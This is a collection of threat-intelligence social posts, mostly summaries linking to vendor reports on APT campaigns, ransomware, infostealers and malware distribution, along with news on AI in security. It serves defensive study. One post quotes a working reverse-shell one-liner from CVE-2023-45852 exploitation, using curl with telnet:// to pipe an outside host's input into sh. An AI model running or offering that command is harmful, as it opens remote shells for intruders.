Good day everyone!

Check Point Software researchers produced another great article that involves #APT29 and #phishing and a little bit of masquerading. This phishing campaign targeted European diplomatic entities that distributes fake invitations to diplomatic events and appears to be a continuation of a previous campaign run by the same actors. These phishing emails utilized a backdoor known as #Wineloader and also employs a new loader #Grapeloader. There is a lot to unpack here and I hope you enjoy!

Renewed APT29 Phishing Campaign Against European Diplomats
https://research.checkpoint.com/2025/apt29-phishing-campaign/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

AI in Banking Security: Revolution & Risks

#TycoonWorld #AIinBanking #BankingSecurity #CyberSecurityAI #FinTechSecurity #ArtificialIntelligence #MachineLearning #AnomalyDetection #BehavioralAnalytics #ThreatDetection #FraudPrevention #PredictiveAnalytics #EthicalAI #DataPrivacy #ExplainableAI #AdversarialAttacks #BankingInnovation #FinancialSecurity #AIethics #AIrisks #DigitalBanking #AIinFinance #AIandCybercrime #SmartBanking #FinTechTrends #CyberRiskMitigation

https://tycoonworld.in/ai-in-banking-security-revolution-risks/

Happy Wednesday everyone!

Today's #readoftheday starts strong! "Microsoft Threat Intelligence and Microsoft Security Response Center (MSRC) have discovered post-compromise exploitation of a zero-day elevation of privilege vulnerability in the Windows Common Log File System (CLFS) against a small number of targets." and their discovery involved #PipeMagic malware which was used to deploy ransomware. Enjoy and Happy Hunting!

Exploitation of CLFS zero-day leads to ransomware activity
https://www.microsoft.com/en-us/security/blog/2025/04/08/exploitation-of-clfs-zero-day-leads-to-ransomware-activity/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

Good day everyone!

Today's #readoftheday involves Microsoft Office add-ins, masquerading, trojans, and MUCH MORE! Kaspersky researchers share the details about a project on SourceForge that was distributing malware. It appeared to be a project for Microsoft Office add-ins, that were copied from a legitimate project on GitHub, but in reality was a list of Microsoft Office applications that led to an archive that contained an installer file (.msi). Once that is run, a bunch of bad stuff happens (I'm not going to ruin it for you) and then you are left with a miner and the #ClipBanker malware that replaces cryptocurrency wallet addresses in the clipboard with the attacker's own, which is pretty interesting as well! I hope you enjoy it as much as I did! Happy Hunting!

Attackers distributing a miner and the ClipBanker Trojan via SourceForge
https://securelist.com/miner-clipbanker-sourceforge-campaign/116088/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

Happy Monday everyone!

Just got done reading an incredible article from ESET researchers describing an APT group that was long thought to be inactive alive in well! #FamousSparrow is a China-aligned APT group that has had no publicly documented activity since 2022 and was found using two previously undocumented versions of their backdoor, SparrowDoor. They used a mix of publicly available and custom tools for their attack ultimately leading to the deployment of SparrowDoor and ShadowPad (a privately sold backdoor). This report gets more and more interesting as you go so please go take the time to read it! Enjoy and Happy Hunting!

You will always remember this as the day you finally caught FamousSparrow
https://www.welivesecurity.com/en/eset-research/you-will-always-remember-this-as-the-day-you-finally-caught-famoussparrow/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Identity attacks and infostealers dominate the Red Canary 2025 Threat Detection Report: https://redcanary.com/blog/threat-detection/2025-threat-detection-report/

SUSE announces AI-powered integration with @SUSE Security and Microsoft Sentinel
https://www.admin-magazine.com/News/SUSE-Security-Announces-Integration-with-Microsoft-Sentinel?utm_source=SM
#SUSE #Sentinel #Microsoft #ArtificialIntelligence #security #integration #Copilot #ThreatDetection

Happy Wednesday!

I know this is a repeat of yesterday, but tomorrow is the day! You still have time to register and get your community HUNTER account before we begin! I look forward to seeing you there! Happy Hunting!
https://www.linkedin.com/events/threathuntingfoundationsworksho7300891886297235456/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #workshop #webinar

After Detecting 30B Phishing Attempts, Microsoft Adds Even More AI to Its Security Copilot – Source: www.techrepublic.com https://ciso2ciso.com/after-detecting-30b-phishing-attempts-microsoft-adds-even-more-ai-to-its-security-copilot-source-www-techrepublic-com/ #microsoftsecuritycopilot #rssfeedpostgeneratorecho #ArtificialIntelligence #SecurityonTechRepublic #SecurityTechRepublic #CyberSecurityNews #threatdetection #CloudSecurity #Cybersecurity #Microsoft #Phishing #Security #cloud #News

Supply Chain Attacks on Linux Distributions

https://fenrisk.com/supply-chain-attacks

Happy Monday everyone!

Coming out of a brief lull in activity, I have a #readoftheday for you! This comes from a CYFIRMA article that takes a look at the APT #VoltTyphoon. They share vulnerabilities that have been recently exploited and (my favorite part) recent #TTPs and #behaviors that are associated with the group! I like how well it is documented that I am not even going to recreate it here! I will definitely diving back into their archives to see if there are more of these profile articles! Enjoy and Happy Hunting!

APT PROFILE – VOLT TYPHOON
https://www.cyfirma.com/research/apt-profile-volt-typhoon-2/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

The Risks of AI for Detecting Threats - A Bit of Security for March 17, 2025
What is the downside of relying on AI to detect threats? Listen to this -
https://youtu.be/_0AdSztIT9Y
#cybersecuritytips #attachsurface #antimalware #AIsecurity #threatdetection #BitofSec

Conducting forensics of mobile devices to find signs of a potential compromise

https://github.com/mvt-project/mvt

First time I'm seeing curl being used with telnet:// to fetch a payload. Found in an exploitation of CVE-2023-45852

C='curl -Ns telnet://x.x.x.x:4444'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null

The AI Arms Race: Cybercriminals Harnessing AI While Defenders Innovate

As cybercriminals leverage AI for more sophisticated attacks, the cybersecurity industry is racing to develop countermeasures. From AI-driven phishing schemes to advanced threat detection, the battle ...

https://news.lavx.hu/article/the-ai-arms-race-cybercriminals-harnessing-ai-while-defenders-innovate

Happy Monday everyone!

Today's #readoftheday is brought to you by Trend Micro and they share their findings related to #BlackBasta and #CactusRansomware adding a piece of malware known as #BackConnect to their toolbox.

The report states "The BackConnect malware is a tool that cybercriminals use to establish and maintain persistent control over compromised systems. Once infiltrated, it grants attackers a wide range of remote control capabilities, allowing them to execute commands on the infected machine. This enables them to steal sensitive data, such as login credentials, financial information, and personal files."

Behaviors (MITRE ATT&CK):
Initial Access - TA0001:
Phishing: Spearphishing Voice - T1566.004 - The attackers conducted an email bombing campaign then contacted the victim posing as "IT Support" or "HelpDesk".

Command and Control - TA0011:
Remote Access Software - T1219 -
The attackers used QuickAssist to access the victim's environment once they were successfully social engineered.

Lateral Movement - TA0008:
Remote Services: SMB/ Windows Admin Shares - T1021.002 -
Remote Services: Windows Remote Management - T1021.006
The attackers leveraged both SMB, shared folders, and WinRM for lateral movement.

Go check out the rest of the technical details! Enjoy and Happy Hunting!

Black Basta and Cactus Ransomware Groups Add BackConnect Malware to Their Arsenal
https://www.trendmicro.com/en_us/research/25/b/black-basta-cactus-ransomware-backconnect.html?&web_view=true

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

Happy Friday everyone!

I feel like this has become a weekly PSA but Kaspersky Securelist researchers have identified hundreds of #GitHub projects that are serving up malicious code designed to steal saved credentials, cryptocurrency wallets, and browsing history. Sometimes this execution of code leads to the #ASyncRAT or #Quasar Backdoor, but the threat remains the same: blindly executing code from GitHub. I hope you enjoy and Happy Hunting!

The GitVenom campaign: cryptocurrency theft using GitHub

https://securelist.com/gitvenom-campaign/115694/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Good day everyone!

An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used an age-old technique of spear-phishing to gain initial access that had various attachments that would contain the legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.

As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!

Angry Likho: Old beasts in a new forest
https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Good day everyone!

Forescout Technologies Inc. researchers identified a malware cluster that masqueraded as MediaViewerLauncher.exe, the primary executable for the Philips DICOM viewer that has been associated with the Chinese APT #SilverFox. When downloaded, these executables led to the deployment of the #ValleyRAT (Remote Access Trojan), a backdoor, keylogger, and a crypto miner on victim computers.

Behaviors (MITRE ATT&CK):
Discovery - TA0007
System Network Configuration Discovery: Internet Connection Discovery - T1016.001: Living-off-the-land binaries are used to check if the system can reach the C2 server.

Persistence - TA0003:
Scheduled Task/Job: Scheduled Task - T1053.003:
The malware creates a scheduled task that will trigger on logon for persistence.

Healthcare Malware Hunt, Part 1: Silver Fox APT Targets Philips DICOM Viewers
https://lnkd.in/ghQS3nwv

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday #HappyHunting

Happy Monday everyone!

The AhnLab, Inc. Security Intelligence Center (ASEC) has been monitoring infostealer malware that is disguised as illegal software and keygens and found that most of the malware that is distributed in this manner has been the #LummaC2 infostealer BUT there has been an increase in distribution of the #ACRStealer as well. What is pretty interesting is the technique they use for C2. In this case they have used Steam, telegra.ph, Google Docs (Form) and Google Docs (Presentation). Enjoy and Happy Hunting!

ACRStealer Infostealer Exploiting Google Docs as C2
https://asec.ahnlab.com/en/86390/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday